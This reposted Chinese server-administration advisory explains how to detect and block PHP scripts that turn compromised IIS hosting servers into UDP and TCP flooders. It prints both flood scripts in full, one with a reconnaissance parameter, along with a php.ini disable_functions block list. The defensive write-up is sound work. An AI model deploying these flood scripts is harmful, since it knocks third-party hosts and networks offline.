防止用户利用PHP代码DOS造成用光网络带宽

2020-03-07 170百度已收录

防止用户利用PHP代码DOS造成用光网络带宽

星外科技原创,转载请说明 

特征: 

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 


$packets = 0; 
$ip = $_GET[\'ip\']; 
$rand = $_GET[\'port\']; 
set_time_limit(0); 
ignore_user_abort(FALSE); 

$exec_time = $_GET[\'time\']; 

$time = time(); 
print \"Flooded: $ip on port $rand 

\"; 
$max_time = $time+$exec_time; 


for($i=0;$i<65535;$i++){ 
$out .= \"X\"; 

while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 


$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 


echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\"; 
?> 


表现特征: 

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包. 


近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题. 


如何快速找到这些站? 

你可以打开日志 

C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件, 
里面有类似这样的记录: 

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1 

最后三项 783 Disabled 30_FreeHost_1 
783就是这个站在IIS中的ID 
30_FreeHost_1就是所在池 


解决办法: 

1.按上述找到这个网站后停止它.或停止池,并重启IIS. 

2.在IP策略,或防火墙中,禁止所有udp向外发送 

在星外最新版本的安全包中,已带有4.0版本的IP策略,您导入后就直接可以限制了外发的UDP包。您可以用主控用户名密码登陆7i24.com,在软件下载,新用户下载中有。但这个策略并没有关闭DNS端口,部分攻击还是有效. 

为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址 "特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8" 保存后就行了 ) 

在2011-4-27,我们上传了新的安全包,里面有一个"星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec"文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常) 


3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.) 

4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS 

ignore_user_abort = On 
(注意前面的;号要删除) 

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate, 
在后面加上 

fsockopen,set_time_limit,ignore_user_abort 

但这样会造成很多php程序都不正常. 

5.在服务器要用关键词tcp或udp搜索所有php类文件,找到攻击文件,删除它。 
(注意很多木马可能是隐藏为系统属性的文件) 

另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么? 


2011-10-22 
近期已有新的基于TCP攻击的PHPDDOS代码如下: 
set_time_limit(999999); 
$host = $_GET['host']; 
$port = $_GET['port']; 
$exec_time = $_GET['time']; 
$packets = 64; 
ignore_user_abort(True); 

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
if (StrLen($_GET['rat'])<>0){ 
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit; 

exit; 

$max_time = time()+$exec_time; 
while(1){ 
$packets++; 
if(time() > $max_time or $exec_time != 69){ 
break; 

$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0); 

?> 
同样,可以采有以下解决办法: 

1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS 

ignore_user_abort = On 
(注意前面的;号要删除) 

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate, 
在后面加上 

fsockopen,set_time_limit 

但这样会造成很多php程序都不正常. 

2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上。 

3.在服务器要用关键词tcp或udp搜索所有php类文件,找到攻击文件,删除它。 
(注意很多木马可能是隐藏为系统属性的文件) 

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如果您也有好的资源或教程,您可以投稿发布,成功分享后有金币奖励和额外收入!
8. 重点来了,想白嫖的站长们可每日签到获取金币来免费购买本站资源,等级不同赠送金币不同哦!

官方客服团队

为您解决烦忧 - 24小时在线 专业服务